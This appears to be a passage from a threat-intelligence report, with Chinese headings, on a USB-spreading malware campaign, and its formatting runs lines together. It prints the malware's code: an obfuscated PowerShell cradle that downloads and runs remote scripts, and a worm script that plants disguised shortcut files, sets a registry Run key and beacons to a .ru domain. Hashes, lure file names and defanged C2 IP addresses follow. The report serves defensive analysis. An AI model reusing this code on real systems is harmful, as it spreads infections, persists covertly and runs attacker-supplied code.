CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\appdata\local\temp\desert" //e:vbscript //b /dmc /j2k /spl /nffCSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\favorites\jumper.asf" //e:vbscript //b /asf /mdf /nab /apkwscript.exe "C:\Users\[REDACTED]\Contacts\delightful.abk" //e:vbscript //b /cfg /mdm /cfm /mp4
"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden "$gt='/get.'+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+48);[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=[char](57+57);$hosta+=[char](60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text"CSIDL_SYSTEM\wscript.exe CSIDL_PROFILE\appdata\local\temp\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4modelfUNCtIon sET-lnK ($chILd) {$nAMetxt = "foto.sAfe".TolowER();$NAmE = ("кОМПРОМат", "КОРЗиНА", "СеКРетнО" | GeT-rAnDOm).ToUPPeR();$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +"\$nAMe.LNK");$shoRtCuT.iConloCaTiON = "C:\wiNDoWS\SysteM32\SHELL32.DLL,3";$SHOrTcUT.TArGetpAth = "c:\wInDOwS\sYstEm32\WInDOwSpowERshell\V1.0\POwERShEll.ExE".ToLoweR();$text = "-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\$NAMetxt | OUT-STrIng))".TOlower();$sHORTCUT.ArGUMEnTs = $tExt;$sHortCUT.saVE();$mYfIlE= $chIlD+"\$naMeTXT"cOPY-Item $enV:UsErprOfilE\iNdEx.phP -deSTINAtION $mYfILE$FIlE=GEt-ITEM $mYfiLE -forCe$FiLe.ATtRiButes='hiDDEN'}Set-ITemPRoPERTY -pAth HkCU:\soFTWare\MicROsOfT\WiNDows\cURRENtVerSiON\ruN -NAME safE -valUE $env:windir'\sYSTeM32\wINDoWSPowErSHEll\v1.0\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\INdEX.PHp | Out-sTRing) | poweRSHeLL -noPROfILE';coPy-item .\"fOtO.safe" -dEsTInaTioN $Env:USeRprOFIle\iNdEX.pHpWHile($CoUNT -lE 2){$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer "drIvETYPe='2'";$Drive.naMe | FOreaCH-oBJecT{$CHiLdS = GET-ChilDITem $drivE.nAMefoReach($cHilDs IN $chiLDs){if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy ){sET-lnk $chILds.fUlLName}}IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){SEt-lNK $DRivE.name}}STArt-SLEeP -S 300;}
妥协指标
恶意文件f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d630619231e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096bc62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c83393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada8596171373458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8USB 传播脚本28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c012aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df591d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86创建的 LNK 文件示例7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519aLNK 文件名account.rtf.lnkaccount_card.rtf.lnkapplication.rtf.lnkbank_accоunt.rtf.lnkblank_cap.rtf.lnkbusiness trip.rtf.lnkcompromising_evidence.rtf.lnkconduct.rtf.lnkcuprovod.rtf.lnkdo_not_delete.rtf.lnkdsk.rtf.lnkencouragement.rtf.lnkform_new.rtf.lnkinstructions.rtf.lnkjourney.mdbletter to.rtf.lnklogin_password.docx.lnklogin_password.rtf.lnkmobilization.rtf.lnkmy_documents.rtf.lnkmy_photos.rtf.lnknot_delete.rtf.lnkon_account.rtf.lnkorder.rtf.lnkpetition.rtf.lnkporn_video.rtf.lnkpornography.rtf.lnkpornophoto.rtf.lnkproceedings.rtf.lnkproject_sheet.rtf.lnkreport.docx.lnkreport.rtf.lnkreport_note.rtf.lnkrequest.rtf.lnkresolution.rtf.lnksecret.rtf.lnksecretly.rtf.lnkservice.docx.lnkservice.rtf.lnksources.rtf.lnksupport.rtf.lnkweapons_list.rtf.lnk最近的 C&C 基础设施 (2023)45.76.141[.]166159.223.112[.]245140.82.56[.]186159.203.164[.]19445.32.94[.]5845.95.232[.]33139.59.109[.]100164.92.245[.]24645.32.101[.]6140.82.18[.]48216.128.140[.]45146.190.127[.]238207.148.74[.]68195.133.88[.]19146.190.60[.]23084.32.190[.]137206.189.154[.]168188.166.4[.]128104.248.54[.]250165.227.76[.]8466.42.104[.]158161.35.95[.]47149.28.125[.]56143.198.50[.]11866.42.126[.]12164.227.72[.]21081.19.140[.]147165.232.77[.]197146.190.117[.]209134.122.51[.]47143.198.152[.]232140.82.47[.]181159.223.102[.]109170.64.188[.]146155.138.194[.]24445.32.88[.]9089.185.84[.]3264.226.84[.]229206.189.14[.]9424.199.84[.]13245.32.41[.]11584.32.188[.]69206.189.128[.]172170.64.168[.]228161.35.238[.]148170.64.138[.]138178.128.86[.]43206.81.28[.]5178.128.231[.]18045.77.115[.]67136.244.65[.]253143.244.190[.]199159.65.176[.]121192.248.154[.]154209.97.175[.]128147.182.240[.]58146.190.212[.]239143.198.135[.]13245.76.202[.]102142.93.108[.]146.101.127[.]147134.209.0[.]136138.68.110[.]19167.99.215[.]50161.35.232[.]11888.216.210[.]3165.227.121[.]87165.227.48[.]59108.61.211[.]25089.185.84[.]48167.172.69[.]12389.185.84[.]50206.189.0[.]13468.183.200[.]0178.128.16[.]17095.179.144[.]161164.92.222[.]845.95.233[.]8078.141.239[.]24149.28.181[.]23224.199.107[.]21845.32.184[.]140167.172.20[.]15984.32.190[.]31164.92.185[.]6084.32.131[.]38137.184.178[.]46206.189.149[.]103157.245.176[.]12345.95.232[.]9245.95.232[.]29170.64.150[.]9089.185.84[.]45140.82.16[.]12084.32.185[.]136134.122.43[.]175195.133.88[.]5584.32.191[.]14778.141.238[.]13645.82.13[.]84159.65.248[.]084.32.34[.]69170.64.146[.]19445.82.13[.]2245.82.13[.]23134.209.33[.]42199.247.8[.]11584.32.128[.]239173.199.70[.]238138.68.174[.]177178.128.213[.]177143.110.180[.]68167.172.144[.]127165.232.165[.]4245.95.232[.]51149.28.98[.]149104.156.230[.]193104.248.86[.]158134.122.51[.]47134.209.182[.]221139.59.60[.]191140.82.11[.]60140.82.47[.]181140.82.50[.]37143.198.135[.]132143.198.53[.]203147.182.250[.]33149.28.130[.]189149.28.181[.]232149.28.98[.]149155.138.194[.]244157.245.69[.]118158.247.204[.]242159.223.102[.]109159.223.23[.]23164.92.72[.]212165.22.72[.]74165.227.76[.]84165.232.120[.]169167.172.58[.]96167.71.67[.]58170.64.136[.]186170.64.140[.]214170.64.156[.]98178.128.228[.]252188.166.176[.]39188.166.7[.]140193.149.176[.]26195.133.88[.]55202.182.116[.]135202.182.98[.]100206.189.80[.]216207.148.72[.]17331.129.22[.]4631.129.22[.]4831.129.22[.]5045.32.101[.]645.32.117[.]6245.32.158[.]9645.32.62[.]10045.32.88[.]9045.82.13[.]8445.95.232[.]3345.95.232[.]7445.95.233[.]805.199.161[.]2964.226.84[.]22964.227.64[.]16366.42.104[.]15868.183.200[.]078.141.239[.]2478.153.139[.]781.19.140[.]14784.32.131[.]4784.32.188[.]1395.179.144[.]16195.179.245[.]185216.128.178[.]248